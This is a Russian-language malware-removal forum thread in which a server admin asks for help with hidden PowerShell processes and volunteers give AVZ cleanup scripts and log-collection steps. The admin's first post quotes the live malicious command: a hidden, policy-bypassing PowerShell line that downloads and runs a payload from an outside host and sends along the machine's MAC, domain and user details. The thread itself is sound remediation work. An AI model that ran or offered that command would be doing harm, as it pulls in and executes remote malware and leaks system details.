Windows 2008 r2 после загрузки появляется несколько процессов powershell
Вот с таким скриптов
powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://down.bddp.net/d64.dat?allv6&mac=00-19-D1-A9-99-6E&av=&version=6.1.7601&bit=64-bit&flag2=True&domain=hard.nov&user=SMS01$&PS=True')"

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (http://safezone.cc/forum/showthread.php?t=18577).

Выполните скрипт в АВЗ (http://forum.oszone.net/post-1430637-4.html) (Файл - Выполнить скрипт):

begin
ClearQuarantineEx(true);
QuarantineFile('C:\Windows\system32\tasks\00-19-D1-A9-99-6E', '');
QuarantineFile('C:\Windows\system32\tasks\Rass', '');
DeleteSchedulerTask('Microsoft\Windows\00-19-D1-A9-99-6E');
DeleteSchedulerTask('Microsoft\Windows\Rass');
end.


Перезагрузите компьютер вручную.

После перезагрузки, выполните такой скрипт:

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина (http://dragokas.com/virusnet/) или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.


Повторите логи по правилам (http://forum.oszone.net/thread-98169.html). Для повторной диагностики запустите снова Autologger.
Прикрепите свежий CollectionLog.

Спасибо, как снимать лог с виртуальных машин Hyper-V?

В первом сообщении вы же прикрепили лог.

Этот был один из серверов. И там всё стало хорошо. Есть ещё три сервера, но они на виртуальных машинах и логирование не удаётся выполнить из-за того что подключен по РДП. Через оснастку mmc то же самое говорит.

И там всё стало хорошо »
Так покажите контрольный лог.

Есть ещё три сервера »
Действуем по принципу один компьютер - одна тема.
Сделайте на виртуалках так:
Скачайте AutorunsVTchecker (https://safezone.cc/resources/211/). Распакуйте и запустите. Не дожидаясь окончания сканирования,
Скачайте Universal Virus Sniffer (https://safezone.cc/resources/7/) (uVS)
Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
Дождитесь окончания работы программы и прикрепите лог к посту в теме.
!!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

Подробнее читайте в руководстве Как подготовить лог UVS. (https://safezone.cc/threads/14508/#post-79351)

После выполнения данных скриптов - через несколько дней опять появляются процессы powershell.
Выполнение данного скрипта помогает на некоторое время.

на hyper-v core как то можно запустить эти скрипты?

Я ведь говорил, что
один компьютер - одна тема »
так как скрипт не универсальный и основан на логах конкретной системы.

Продолжать вы почему-то не хотите.

Это про тот же компьютер. Нам опять запустились процессы. Про Hyper-v мне создать отдельную тему?

Это про тот же компьютер »
И я про тот же :)
В сообщении №6 инструкция по сбору очередного лога.

Про Hyper-v »
Пробовали там запустить Autologger?

Создал новую ветку по другому серверу - http://forum.oszone.net/showthread.php?p=2894646&posted=1#post2894646